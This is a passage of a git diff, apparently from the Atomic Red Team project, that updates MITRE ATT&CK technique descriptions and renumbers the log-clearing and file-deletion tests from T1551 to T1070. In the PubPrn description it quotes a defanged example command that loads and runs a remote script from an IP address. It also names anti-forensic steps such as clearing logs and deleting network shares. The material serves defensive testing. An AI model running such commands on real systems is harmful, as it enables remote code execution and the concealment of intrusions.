- Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services. (Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
-
- Perform regular audits of domain and local system accounts to detect accounts that may have been created by an adversary for persistence. Checks on these accounts could also include whether default accounts such as Guest have been activated. These audits should also include checks on any appliances and applications for default credentials or SSH keys, and if any are discovered, they should be updated immediately.
- x_mitre_permissions_required:
- - User
- - Administrator
- x_mitre_effective_permissions:
- - User
- - Administrator
+ x_mitre_is_subtechnique: false
+ x_mitre_contributors:
+ - Netskope
+ - Mark Wee
+ - Praetorian
x_mitre_platforms:
- Linux
- macOS
@@ -50371,9 +51849,27 @@ initial-access:
- SaaS
- Office 365
- Azure AD
- x_mitre_contributors:
- - Netskope
- - Mark Wee
- - Praetorian
- x_mitre_is_subtechnique: false
+ x_mitre_effective_permissions:
+ - User
+ - Administrator
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ x_mitre_detection: |-
+ Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services. (Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+
+ Perform regular audits of domain and local system accounts to detect accounts that may have been created by an adversary for persistence. Checks on these accounts could also include whether default accounts such as Guest have been activated. These audits should also include checks on any appliances and applications for default credentials or SSH keys, and if any are discovered, they should be updated immediately.
+ x_mitre_defense_bypassed:
+ - Firewall
+ - Host intrusion prevention systems
+ - Network intrusion detection system
+ - Application control
+ - System access controls
+ - Anti-virus
+ x_mitre_data_sources:
+ - AWS CloudTrail logs
+ - Stackdriver logs
+ - Authentication logs
+ - Process monitoring
+ x_mitre_version: '2.1'
atomic_tests: []
diff --git a/atomics/T1018/T1018.md b/atomics/T1018/T1018.md
index abc4edfd..acf3f2de 100644
--- a/atomics/T1018/T1018.md
+++ b/atomics/T1018/T1018.md
@@ -2,7 +2,9 @@
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1018)
Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as [Ping](https://attack.mitre.org/software/S0097) or net view using [Net](https://attack.mitre.org/software/S0039). Adversaries may also use local host files (ex: C:\Windows\System32\Drivers\etc\hosts or /etc/hosts) in order to discover the hostname to IP address mappings of remote systems.
-Specific to macOS, the bonjour protocol exists to discover additional Mac-based systems within the same broadcast domain. In cloud environments, many typical utilities may be used to discover remote systems depending upon the host operating system. In addition, cloud environments often provide APIs that serve information about remote systems and services.
+Specific to macOS, the bonjour protocol exists to discover additional Mac-based systems within the same broadcast domain.
+
+Within IaaS (Infrastructure as a Service) environments, remote systems include instances and virtual machines in various states, including the running or stopped state. Cloud providers have created methods to serve information about remote systems, such as APIs and CLIs. For example, AWS provides a DescribeInstances API within the Amazon EC2 API and a describe-instances command within the AWS CLI that can return information about all instances within an account.(Citation: Amazon Describe Instances API)(Citation: Amazon Describe Instances CLI) Similarly, GCP's Cloud SDK CLI provides the gcloud compute instances list command to list all Google Compute Engine instances in a project, and Azure's CLI az vm list lists details of virtual machines.(Citation: Google Compute Instances)(Citation: Azure VM List)
## Atomic Tests
diff --git a/atomics/T1027.001/T1027.001.md b/atomics/T1027.001/T1027.001.md
index 3144f78f..4659afd9 100644
--- a/atomics/T1027.001/T1027.001.md
+++ b/atomics/T1027.001/T1027.001.md
@@ -2,7 +2,7 @@
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1027.001)
Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This can be done without affecting the functionality or behavior of a binary, but can increase the size of the binary beyond what some security tools are capable of handling due to file size limitations.
-Binary padding effectively changes the checksum of the file and can also be used to avoid hash-based blacklists and static anti-virus signatures.(Citation: ESET OceanLotus) The padding used is commonly generated by a function to create junk data and then appended to the end or applied to sections of malware.(Citation: Securelist Malware Tricks April 2017) Increasing the file size may decrease the effectiveness of certain tools and detection capabilities that are not designed or configured to scan large files. This may also reduce the likelihood of being collected for analysis. Public file scanning services, such as VirusTotal, limits the maximum size of an uploaded file to be analyzed.(Citation: VirusTotal FAQ)
+Binary padding effectively changes the checksum of the file and can also be used to avoid hash-based blocklists and static anti-virus signatures.(Citation: ESET OceanLotus) The padding used is commonly generated by a function to create junk data and then appended to the end or applied to sections of malware.(Citation: Securelist Malware Tricks April 2017) Increasing the file size may decrease the effectiveness of certain tools and detection capabilities that are not designed or configured to scan large files. This may also reduce the likelihood of being collected for analysis. Public file scanning services, such as VirusTotal, limits the maximum size of an uploaded file to be analyzed.(Citation: VirusTotal FAQ)
## Atomic Tests
diff --git a/atomics/T1027/T1027.md b/atomics/T1027/T1027.md
index 030f524b..042692fc 100644
--- a/atomics/T1027/T1027.md
+++ b/atomics/T1027/T1027.md
@@ -6,7 +6,7 @@ Payloads may be compressed, archived, or encrypted in order to avoid detection.
Portions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery. (Citation: Linux/Cdorked.A We Live Security Analysis) Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled. (Citation: Carbon Black Obfuscation Sept 2016)
-Adversaries may also obfuscate commands executed from payloads or directly via a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and whitelisting mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Revoke-Obfuscation July 2017)(Citation: PaloAlto EncodedCommand March 2017)
+Adversaries may also obfuscate commands executed from payloads or directly via a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and application control mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Revoke-Obfuscation July 2017)(Citation: PaloAlto EncodedCommand March 2017)
## Atomic Tests
diff --git a/atomics/T1047/T1047.md b/atomics/T1047/T1047.md
index 7e8f9b47..c4c9ab12 100644
--- a/atomics/T1047/T1047.md
+++ b/atomics/T1047/T1047.md
@@ -2,7 +2,7 @@
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1047)
Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) (Citation: Wikipedia SMB) and Remote Procedure Call Service (RPCS) (Citation: TechNet RPC) for remote access. RPCS operates over port 135. (Citation: MSDN WMI)
-An adversary can use WMI to interact with local and remote systems and use it as a means to perform many tactic functions, such as gathering information for Discovery and remote Execution of files as part of Lateral Movement. (Citation: FireEye WMI 2015)
+An adversary can use WMI to interact with local and remote systems and use it as a means to perform many tactic functions, such as gathering information for Discovery and remote Execution of files as part of Lateral Movement. (Citation: FireEye WMI SANS 2015) (Citation: FireEye WMI 2015)
## Atomic Tests
diff --git a/atomics/T1059.004/T1059.004.md b/atomics/T1059.004/T1059.004.md
index c09b83ca..1e6a7d7a 100644
--- a/atomics/T1059.004/T1059.004.md
+++ b/atomics/T1059.004/T1059.004.md
@@ -1,8 +1,10 @@
-# T1059.004 - Bash
+# T1059.004 - Unix Shell
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1059.004)
-Adversaries may abuse Bash commands and scripts for execution. Bash, the primary macOS (through Mojave) and Linux shell, can control every aspect of a system, with certain commands requiring elevated privileges.
+Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux and macOS systems, though many variations of the Unix shell exist (e.g. sh, bash, zsh, etc.) depending on the specific OS or distribution.(Citation: DieNet Bash)(Citation: Apple ZShell) Unix shells can control every aspect of a system, with certain commands requiring elevated privileges.
-Bash scripts (.sh) provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops. Common uses of Bash scripts include long or repetitive tasks, or the need to run the same set of commands on multiple systems.
+Unix shells also support scripts that enable sequential execution of commands as well as other typical programming operations such as conditionals and loops. Common uses of shell scripts include long or repetitive tasks, or the need to run the same set of commands on multiple systems.
+
+Adversaries may abuse Unix shells to execute various commands or payloads. Interactive shells may be accessed through command and control channels or during lateral movement such as with [SSH](https://attack.mitre.org/techniques/T1021/004). Adversaries may also leverage shell scripts to deliver and execute multiple commands on victims or as part of payloads used for persistence.
## Atomic Tests
diff --git a/atomics/T1551.001/T1551.001.md b/atomics/T1070.001/T1070.001.md
similarity index 97%
rename from atomics/T1551.001/T1551.001.md
rename to atomics/T1070.001/T1070.001.md
index ea84e8b2..98a42e48 100644
--- a/atomics/T1551.001/T1551.001.md
+++ b/atomics/T1070.001/T1070.001.md
@@ -1,5 +1,5 @@
-# T1551.001 - Clear Windows Event Logs
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1551.001)
+# T1070.001 - Clear Windows Event Logs
+## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1070.001)
Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Windows Event Logs are a record of a computer's alerts and notifications. There are three system-defined sources of events: System, Application, and Security, with five event types: Error, Warning, Information, Success Audit, and Failure Audit.
The event logs can be cleared with the following utility commands:
diff --git a/atomics/T1551.001/T1551.001.yaml b/atomics/T1070.001/T1070.001.yaml
similarity index 94%
rename from atomics/T1551.001/T1551.001.yaml
rename to atomics/T1070.001/T1070.001.yaml
index dab90de7..a2b688b4 100644
--- a/atomics/T1551.001/T1551.001.yaml
+++ b/atomics/T1070.001/T1070.001.yaml
@@ -1,4 +1,4 @@
-attack_technique: T1551.001
+attack_technique: T1070.001
display_name: 'Indicator Removal on Host: Clear Windows Event Logs'
atomic_tests:
- name: Clear Logs
diff --git a/atomics/T1551.002/T1551.002.md b/atomics/T1070.002/T1070.002.md
similarity index 97%
rename from atomics/T1551.002/T1551.002.md
rename to atomics/T1070.002/T1070.002.md
index f1fd54be..75b5f4e1 100644
--- a/atomics/T1551.002/T1551.002.md
+++ b/atomics/T1070.002/T1070.002.md
@@ -1,5 +1,5 @@
-# T1551.002 - Clear Linux or Mac System Logs
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1551.002)
+# T1070.002 - Clear Linux or Mac System Logs
+## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1070.002)
Adversaries may clear system logs to hide evidence of an intrusion. macOS and Linux both keep track of system or user-initiated actions via system logs. The majority of native system logging is stored under the /var/log/ directory. Subfolders in this directory categorize logs by their related functions, such as:(Citation: Linux Logs)
* /var/log/messages:: General and system-related messages
diff --git a/atomics/T1551.002/T1551.002.yaml b/atomics/T1070.002/T1070.002.yaml
similarity index 97%
rename from atomics/T1551.002/T1551.002.yaml
rename to atomics/T1070.002/T1070.002.yaml
index e9b1fbfe..b1284938 100644
--- a/atomics/T1551.002/T1551.002.yaml
+++ b/atomics/T1070.002/T1070.002.yaml
@@ -1,4 +1,4 @@
-attack_technique: T1551.002
+attack_technique: T1070.002
display_name: 'Indicator Removal on Host: Clear Linux or Mac System Logs'
atomic_tests:
- name: rm -rf
diff --git a/atomics/T1551.003/T1551.003.md b/atomics/T1070.003/T1070.003.md
similarity index 98%
rename from atomics/T1551.003/T1551.003.md
rename to atomics/T1070.003/T1070.003.md
index 32a927a3..46641601 100644
--- a/atomics/T1551.003/T1551.003.md
+++ b/atomics/T1070.003/T1070.003.md
@@ -1,5 +1,5 @@
-# T1551.003 - Clear Command History
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1551.003)
+# T1070.003 - Clear Command History
+## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1070.003)
In addition to clearing system logs, an adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. macOS and Linux both keep track of the commands users type in their terminal so that users can retrace what they've done.
These logs can be accessed in a few different ways. While logged in, this command history is tracked in a file pointed to by the environment variable HISTFILE. When a user logs off a system, this information is flushed to a file in the user's home directory called ~/.bash_history. The benefit of this is that it allows users to go back to commands they've used before in different sessions.
diff --git a/atomics/T1551.003/T1551.003.yaml b/atomics/T1070.003/T1070.003.yaml
similarity index 98%
rename from atomics/T1551.003/T1551.003.yaml
rename to atomics/T1070.003/T1070.003.yaml
index 2935454c..4b0ce612 100644
--- a/atomics/T1551.003/T1551.003.yaml
+++ b/atomics/T1070.003/T1070.003.yaml
@@ -1,4 +1,4 @@
-attack_technique: T1551.003
+attack_technique: T1070.003
display_name: 'Indicator Removal on Host: Clear Command History'
atomic_tests:
- name: Clear Bash history (rm)
diff --git a/atomics/T1551.004/T1551.004.md b/atomics/T1070.004/T1070.004.md
similarity index 99%
rename from atomics/T1551.004/T1551.004.md
rename to atomics/T1070.004/T1070.004.md
index 953f8393..edfd9ebd 100644
--- a/atomics/T1551.004/T1551.004.md
+++ b/atomics/T1070.004/T1070.004.md
@@ -1,5 +1,5 @@
-# T1551.004 - File Deletion
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1551.004)
+# T1070.004 - File Deletion
+## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1070.004)
Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
There are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well. Examples include native [cmd](https://attack.mitre.org/software/S0106) functions such as DEL, secure deletion tools such as Windows Sysinternals SDelete, or other third-party file deletion tools. (Citation: Trend Micro APT Attack Tools)
diff --git a/atomics/T1551.004/T1551.004.yaml b/atomics/T1070.004/T1070.004.yaml
similarity index 99%
rename from atomics/T1551.004/T1551.004.yaml
rename to atomics/T1070.004/T1070.004.yaml
index 8b74b0db..d1b0a91b 100644
--- a/atomics/T1551.004/T1551.004.yaml
+++ b/atomics/T1070.004/T1070.004.yaml
@@ -1,4 +1,4 @@
-attack_technique: T1551.004
+attack_technique: T1070.004
display_name: 'Indicator Removal on Host: File Deletion'
atomic_tests:
- name: Delete a single file - Linux/macOS
diff --git a/atomics/T1551.005/T1551.005.md b/atomics/T1070.005/T1070.005.md
similarity index 97%
rename from atomics/T1551.005/T1551.005.md
rename to atomics/T1070.005/T1070.005.md
index 41cc78fd..e0be0d89 100644
--- a/atomics/T1551.005/T1551.005.md
+++ b/atomics/T1070.005/T1070.005.md
@@ -1,5 +1,5 @@
-# T1551.005 - Network Share Connection Removal
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1551.005)
+# T1070.005 - Network Share Connection Removal
+## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1070.005)
Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation. Windows shared drive and [Windows Admin Shares](https://attack.mitre.org/techniques/T1077) connections can be removed when no longer needed. [Net](https://attack.mitre.org/software/S0039) is an example utility that can be used to remove network share connections with the net use \\system\share /delete command. (Citation: Technet Net Use)
## Atomic Tests
diff --git a/atomics/T1551.005/T1551.005.yaml b/atomics/T1070.005/T1070.005.yaml
similarity index 96%
rename from atomics/T1551.005/T1551.005.yaml
rename to atomics/T1070.005/T1070.005.yaml
index 6320807d..d9e3fba4 100644
--- a/atomics/T1551.005/T1551.005.yaml
+++ b/atomics/T1070.005/T1070.005.yaml
@@ -1,4 +1,4 @@
-attack_technique: T1551.005
+attack_technique: T1070.005
display_name: 'Indicator Removal on Host: Network Share Connection Removal'
atomic_tests:
- name: Add Network Share
diff --git a/atomics/T1551.006/T1551.006.md b/atomics/T1070.006/T1070.006.md
similarity index 99%
rename from atomics/T1551.006/T1551.006.md
rename to atomics/T1070.006/T1070.006.md
index 522ff630..113c7bb5 100644
--- a/atomics/T1551.006/T1551.006.md
+++ b/atomics/T1070.006/T1070.006.md
@@ -1,5 +1,5 @@
-# T1551.006 - Timestomp
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1551.006)
+# T1070.006 - Timestomp
+## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1070.006)
Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Timestomping may be used along with file name [Masquerading](https://attack.mitre.org/techniques/T1036) to hide malware and tools.(Citation: WindowsIR Anti-Forensic Techniques)
diff --git a/atomics/T1551.006/T1551.006.yaml b/atomics/T1070.006/T1070.006.yaml
similarity index 99%
rename from atomics/T1551.006/T1551.006.yaml
rename to atomics/T1070.006/T1070.006.yaml
index b793b6e9..f2e720e7 100644
--- a/atomics/T1551.006/T1551.006.yaml
+++ b/atomics/T1070.006/T1070.006.yaml
@@ -1,4 +1,4 @@
-attack_technique: T1551.006
+attack_technique: T1070.006
display_name: 'Indicator Removal on Host: Timestomp'
atomic_tests:
- name: Set a file's access timestamp
diff --git a/atomics/T1551/T1551.md b/atomics/T1070/T1070.md
similarity index 97%
rename from atomics/T1551/T1551.md
rename to atomics/T1070/T1070.md
index d27ead91..53bc1937 100644
--- a/atomics/T1551/T1551.md
+++ b/atomics/T1070/T1070.md
@@ -1,5 +1,5 @@
-# T1551 - Indicator Removal on Host
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1551)
+# T1070 - Indicator Removal on Host
+## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1070)
Adversaries may delete or alter generated artifacts on a host system, including logs or captured files such as quarantined malware. Locations and format of logs are platform or product-specific, however standard operating system logs are captured as Windows events or Linux/macOS files such as [Bash History](https://attack.mitre.org/techniques/T1139) and /var/log/*.
These actions may interfere with event collection, reporting, or other notifications used to detect intrusion activity. This that may compromise the integrity of security solutions by causing notable events to go unreported. This activity may also impede forensic analysis and incident response, due to lack of sufficient data to determine what occurred.
diff --git a/atomics/T1551/T1551.yaml b/atomics/T1070/T1070.yaml
similarity index 96%
rename from atomics/T1551/T1551.yaml
rename to atomics/T1070/T1070.yaml
index 19bee78f..b5e0d7a6 100644
--- a/atomics/T1551/T1551.yaml
+++ b/atomics/T1070/T1070.yaml
@@ -1,4 +1,4 @@
-attack_technique: T1551
+attack_technique: T1070
display_name: Indicator Removal on Host
atomic_tests:
- name: Indicator Removal using FSUtil
diff --git a/atomics/T1106/T1106.md b/atomics/T1106/T1106.md
index e9c9721d..e6109e9a 100644
--- a/atomics/T1106/T1106.md
+++ b/atomics/T1106/T1106.md
@@ -1,12 +1,12 @@
# T1106 - Native API
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1106)
-Adversaries may interact with the native Windows application programming interface (API) to execute behaviors. Similar to the system call interface on UNIX systems, the Windows native API provides a controlled means to calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes. The native API is leveraged by the OS during system boot (when other system components are not yet initialized) but is also exposed to user-mode applications via ntdll.dll and ntoskrnl.exe.(Citation: Microsoft NativeAPI)
+Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.(Citation: NT API Windows)(Citation: Linux Kernel API) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
-Functionality provided by the native API is also available via the Windows API, which provides a documented programming interface. For example, functions such as the Windows API CreateProcess will allow programs and scripts to start other processes with proper path and argument parameters.(Citation: Microsoft CreateProcess) This allows API callers to execute a binary, run a CLI command, load modules, etc. Thousands of similar API functions exist for various system operations.(Citation: Microsoft Win32)
+Functionality provided by native APIs are often also exposed to user-mode applications via interfaces and libraries. For example, functions such as the Windows API CreateProcess() or GNU fork() will allow programs and scripts to start other processes.(Citation: Microsoft CreateProcess)(Citation: GNU Fork) This may allow API callers to execute a binary, run a CLI command, load modules, etc. as thousands of similar API functions exist for various system operations.(Citation: Microsoft Win32)(Citation: LIBC)(Citation: GLIBC)
-Other software frameworks, such as Microsoft .NET, are also available to interact with the native API. These frameworks typically provide wrappers/abstractions to API functionalities and are designed for ease-of-use/portability of code.(Citation: Microsoft NET)
+Higher level software frameworks, such as Microsoft .NET and macOS Cocoa, are also available to interact with native APIs. These frameworks typically provide language wrappers/abstractions to API functionalities and are designed for ease-of-use/portability of code.(Citation: Microsoft NET)(Citation: Apple Core Services)(Citation: MACOS Cocoa)(Citation: macOS Foundation)
-Adversaries may abuse the native API as a means of execution. Similar to [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), the native API, and its hierarchy of interfaces, provide mechanisms to interact with and utilize a victimized system.
+Adversaries may abuse these native API functions as a means of executing behaviors. Similar to [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), the native API and its hierarchy of interfaces, provide mechanisms to interact with and utilize various components of a victimized system.
## Atomic Tests
diff --git a/atomics/T1119/T1119.md b/atomics/T1119/T1119.md
index d70acee3..5dc66465 100644
--- a/atomics/T1119/T1119.md
+++ b/atomics/T1119/T1119.md
@@ -1,8 +1,8 @@
# T1119 - Automated Collection
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1119)
-Once established within a system or network, an adversary may use automated techniques for collecting internal data. Methods for performing this technique could include use of [Scripting](https://attack.mitre.org/techniques/T1064) to search for and copy information fitting set criteria such as file type, location, or name at specific time intervals. This functionality could also be built into remote access tools.
+Once established within a system or network, an adversary may use automated techniques for collecting internal data. Methods for performing this technique could include use of a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) to search for and copy information fitting set criteria such as file type, location, or name at specific time intervals. This functionality could also be built into remote access tools.
-This technique may incorporate use of other techniques such as [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) and [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) to identify and move files.
+This technique may incorporate use of other techniques such as [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) and [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570) to identify and move files.
## Atomic Tests
diff --git a/atomics/T1127.001/T1127.001.md b/atomics/T1127.001/T1127.001.md
index d83b102a..c912c41a 100644
--- a/atomics/T1127.001/T1127.001.md
+++ b/atomics/T1127.001/T1127.001.md
@@ -2,7 +2,7 @@
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1127.001)
Adversaries may use MSBuild to proxy execution of code through a trusted Windows utility. MSBuild.exe (Microsoft Build Engine) is a software build platform used by Visual Studio. It handles XML formatted project files that define requirements for loading and building various platforms and configurations.(Citation: MSDN MSBuild)
-Adversaries can abuse MSBuild to proxy execution of malicious code. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# code to be inserted into an XML project file.(Citation: MSDN MSBuild) MSBuild will compile and execute the inline task. MSBuild.exe is a signed Microsoft binary, so when it is used this way it can execute arbitrary code and bypass application whitelisting defenses that are configured to allow MSBuild.exe execution.(Citation: LOLBAS Msbuild)
+Adversaries can abuse MSBuild to proxy execution of malicious code. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# code to be inserted into an XML project file.(Citation: MSDN MSBuild) MSBuild will compile and execute the inline task. MSBuild.exe is a signed Microsoft binary, so when it is used this way it can execute arbitrary code and bypass application control defenses that are configured to allow MSBuild.exe execution.(Citation: LOLBAS Msbuild)
## Atomic Tests
diff --git a/atomics/T1134.004/T1134.004.md b/atomics/T1134.004/T1134.004.md
index d06fc8b8..c4d3066c 100644
--- a/atomics/T1134.004/T1134.004.md
+++ b/atomics/T1134.004/T1134.004.md
@@ -2,7 +2,7 @@
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1134.004)
Adversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges. New processes are typically spawned directly from their parent, or calling, process unless explicitly specified. One way of explicitly assigning the PPID of a new process is via the CreateProcess API call, which supports a parameter that defines the PPID to use.(Citation: DidierStevens SelectMyParent Nov 2009) This functionality is used by Windows features such as User Account Control (UAC) to correctly set the PPID after a requested elevated process is spawned by SYSTEM (typically via svchost.exe or consent.exe) rather than the current user context.(Citation: Microsoft UAC Nov 2018)
-Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1086)/[Rundll32](https://attack.mitre.org/techniques/T1085) to be explorer.exe rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [VBScript](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)
+Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1086)/[Rundll32](https://attack.mitre.org/techniques/T1085) to be explorer.exe rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)
Explicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as lsass.exe), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)
diff --git a/atomics/T1216.001/T1216.001.md b/atomics/T1216.001/T1216.001.md
index 8ff7b691..de1597eb 100644
--- a/atomics/T1216.001/T1216.001.md
+++ b/atomics/T1216.001/T1216.001.md
@@ -1,6 +1,6 @@
# T1216.001 - PubPrn
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1216.001)
-Adversaries may use the trusted PubPrn script to proxy execution of malicious files. This behavior may bypass signature validation restrictions and application whitelisting solutions that do not account for use of these scripts.
+Adversaries may use the trusted PubPrn script to proxy execution of malicious files. This behavior may bypass signature validation restrictions and application control solutions that do not account for use of these scripts.
PubPrn.vbs is a Visual Basic script that publishes a printer to Active Directory Domain Services. The script is signed by Microsoft and can be used to proxy execution from a remote site.(Citation: Enigma0x3 PubPrn Bypass) An example command is cscript C[:]\Windows\System32\Printing_Admin_Scripts\en-US\pubprn[.]vbs 127.0.0.1 script:http[:]//192.168.1.100/hi.png.
diff --git a/atomics/T1216/T1216.md b/atomics/T1216/T1216.md
index 65197469..c2802d6b 100644
--- a/atomics/T1216/T1216.md
+++ b/atomics/T1216/T1216.md
@@ -1,6 +1,6 @@
# T1216 - Signed Script Proxy Execution
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1216)
-Adversaries may use scripts signed with trusted certificates to proxy execution of malicious files. Several Microsoft signed scripts that are default on Windows installations can be used to proxy execution of other files. This behavior may be abused by adversaries to execute malicious files that could bypass application whitelisting and signature validation on systems.(Citation: GitHub Ultimate AppLocker Bypass List)
+Adversaries may use scripts signed with trusted certificates to proxy execution of malicious files. Several Microsoft signed scripts that are default on Windows installations can be used to proxy execution of other files. This behavior may be abused by adversaries to execute malicious files that could bypass application control and signature validation on systems.(Citation: GitHub Ultimate AppLocker Bypass List)
## Atomic Tests
diff --git a/atomics/T1218.001/T1218.001.md b/atomics/T1218.001/T1218.001.md
index 7ad2b997..975f9ef4 100644
--- a/atomics/T1218.001/T1218.001.md
+++ b/atomics/T1218.001/T1218.001.md
@@ -2,7 +2,7 @@
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1218.001)
Adversaries may abuse Compiled HTML files (.chm) to conceal malicious code. CHM files are commonly distributed as part of the Microsoft HTML Help system. CHM files are compressed compilations of various content such as HTML documents, images, and scripting/web related programming languages such VBA, JScript, Java, and ActiveX. (Citation: Microsoft HTML Help May 2018) CHM content is displayed using underlying components of the Internet Explorer browser (Citation: Microsoft HTML Help ActiveX) loaded by the HTML Help executable program (hh.exe). (Citation: Microsoft HTML Help Executable Program)
-A custom CHM file containing embedded payloads could be delivered to a victim then triggered by [User Execution](https://attack.mitre.org/techniques/T1204). CHM execution may also bypass application whitelisting on older and/or unpatched systems that do not account for execution of binaries through hh.exe. (Citation: MsitPros CHM Aug 2017) (Citation: Microsoft CVE-2017-8625 Aug 2017)
+A custom CHM file containing embedded payloads could be delivered to a victim then triggered by [User Execution](https://attack.mitre.org/techniques/T1204). CHM execution may also bypass application application control on older and/or unpatched systems that do not account for execution of binaries through hh.exe. (Citation: MsitPros CHM Aug 2017) (Citation: Microsoft CVE-2017-8625 Aug 2017)
## Atomic Tests
diff --git a/atomics/T1218.002/T1218.002.md b/atomics/T1218.002/T1218.002.md
index 91111ef3..1598a763 100644
--- a/atomics/T1218.002/T1218.002.md
+++ b/atomics/T1218.002/T1218.002.md
@@ -4,7 +4,7 @@
For ease of use, Control Panel items typically include graphical menus available to users after being registered and loaded into the Control Panel. (Citation: Microsoft Implementing CPL)
